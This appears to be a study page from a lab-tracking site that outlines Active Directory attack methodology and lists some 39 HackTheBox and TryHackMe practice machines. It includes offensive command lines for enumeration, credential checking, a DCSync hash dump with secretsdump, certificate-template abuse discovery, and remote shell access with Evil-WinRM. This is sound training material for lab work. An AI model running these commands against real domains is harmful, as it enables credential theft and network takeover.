ZeroBox

Active Directory: practice machines and key commands

Active Directory is the identity backbone of most Windows networks, and attacking it is the core of many labs and exams. The usual flow is to get any valid domain credential, enumerate users, groups, computers, ACLs and certificate templates, then chain misconfigurations toward Domain Admin. BloodHound turns that enumeration into a graph so you can see the shortest path, for example a user with GenericAll over a group that can reset a service account password. Common stepping stones are Kerberoasting, AS-REP roasting, password reuse, ACL abuse, delegation and weak AD CS templates. Finish with DCSync or a dump of NTDS.dit to prove impact. Always note which account you hold and what it can touch, because AD paths are about relationships rather than single exploits. The machines below use these ideas in practice.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

SharpHound AD Collector Execution

Collect all Active Directory objects, trusts, ACLs, and sessions into zip archive.

.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zip

PowerView Domain & User Recon

Import PowerView and list domain controllers, domain users, and admin groups.

powershell -ep bypass
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
Get-DomainGroupMember -Identity "Domain Admins"

NetExec / CrackMapExec Domain Sweep

Check SMB credentials validity, local admin status (Pwn3d!), and password policies.

nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares

Impacket SecretsDump (NTDS.dit & SAM Dumps)

DCSync entire domain credentials directly over RPC using domain admin account.

impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlm

Certipy AD CS Vulnerable Template Enumeration

Find vulnerable Active Directory Certificate Services templates (ESC1-ESC13).

certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdout

Evil-WinRM Remote PowerShell Access

Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.

evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts

Keep going

Active Directory machines (39)

Machines are matched by their technique tags. 38 Windows, 1 Linux.

Easy (5)

MachinePlatformOSTags
Active Directory BasicsTHMWindowsActive Directory, Domain Controller, Forests, Trusts
Active Directory EnumerationTHMWindowsActive Directory, Enumeration, PowerView, BloodHound
BloodHound BasicsTHMWindowsBloodHound, Neo4j, Graph Theory, Active Directory
ForestHTBWindowsAS-REP Roasting, ASREPRoasting, Active Directory, BloodHound
SaunaHTBWindowsAS-REP Roasting, ASREPRoasting-Attack, Active Directory, BloodHound

Medium (24)

MachinePlatformOSTags
Active Directory HardeningTHMWindowsActive Directory, Hardening, LAPS, Tier Model
AD Certificate TemplatesTHMWindowsADCS, ESC1, Certipy, Certificates
AD Tier ModelTHMWindowsActive Directory, Tier Model, PAW, Hardening
AdministratorHTBWindowsActiveDirectory, ADCS, Golden-Cert, Kerberoasting
Attacking KerberosTHMWindowsKerberos, ASREPRoast, Kerberoasting, Silver Ticket
Attacktive DirectoryTHMWindowsActiveDirectory, Kerberos, ASREPRoast, Secretsdump
Breaching Active DirectoryTHMWindowsActive Directory, NTLM Relay, LLMNR-Poisoning, Responder
CascadeHTBWindowsAD Recycle Bin, AES-Encryption, Active Directory, Active-Directory
Domain Privilege EscalationTHMWindowsActive Directory, BloodHound, GPO Abuse, ACLs
EdenTHMWindowsActive Directory, Kerberos, Pass-the-Ticket, BloodHound
EscapeTwoHTBWindowsActiveDirectory, MSSQL-Linked-Server, Coerce-Authentication, GPO-Abuse
Exploiting Active DirectoryTHMWindowsActive Directory, Kerberoasting, ASREPRoasting, Pass-the-Hash
FlightHTBWindowsCPTS, Active Directory, Pivoting, Responder
IntelligenceHTBWindowsAD CS, ADIDNS-abuse, Active Directory, BloodHound
Lateral Movement and PivotingTHMWindowsActive Directory, Pivoting, Lateral Movement, WMI
ManagerHTBWindowsCPTS, Active Directory, MSSQL, AD CS
MonteverdeHTBWindowsActive Directory, Azure AD Connect, BloodHound, MSOL
Only4YouHTBLinuxCPTS, Cypher Injection, Neo4j, Pivoting
QuerierHTBWindowsExcel-macros, HTB, PowerView
ResoluteHTBWindowsActive Directory, DLL Injection, DNSAdmins, DnsAdmins-Abuse
ScrambledHTBWindowsActive Directory, Deserialization, Deserialization-attacks, Kerberoasting
VulnNet: Active (Retired)THMWindowsActive Directory, Redis, GPP-Passwords, Kerberoast
VulnNet: RoastedTHMWindowsActiveDirectory, Kerberos, ASREPRoast, GPO
ZaTHMWindowsActive Directory, Kerberos, BloodHound, GPO Abuse

Hard (9)

MachinePlatformOSTags
Active Directory TrustsTHMWindowsActive Directory, Domain Trusts, SID History, Trust Abuse
BlackfieldHTBWindowsAS-REP Roasting, Active Directory, Anonymous-/-Guest, BloodHound
EnterpriseTHMWindowsActive Directory, ZeroLogon, SQLi, Privilege Escalation
HoloTHMWindowsActive Directory, Multi-Host, Kerberos, BloodHound
LedgerTHMWindowsTHM, Active Directory
Raz0rBlackTHMWindowsActive Directory, NFS, Kerberos, AS-REP Roasting
ResetTHMWindowsTHM, Active Directory
ThrowbackTHMWindowsActive Directory, Red Team, Network, C2
WreathTHMWindowsActive Directory, Pivoting, Chisel, Empire

Insane (1)

MachinePlatformOSTags
SizzleHTBWindowsDCSync, HTB, Kerberoasting, Passwordless-login

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox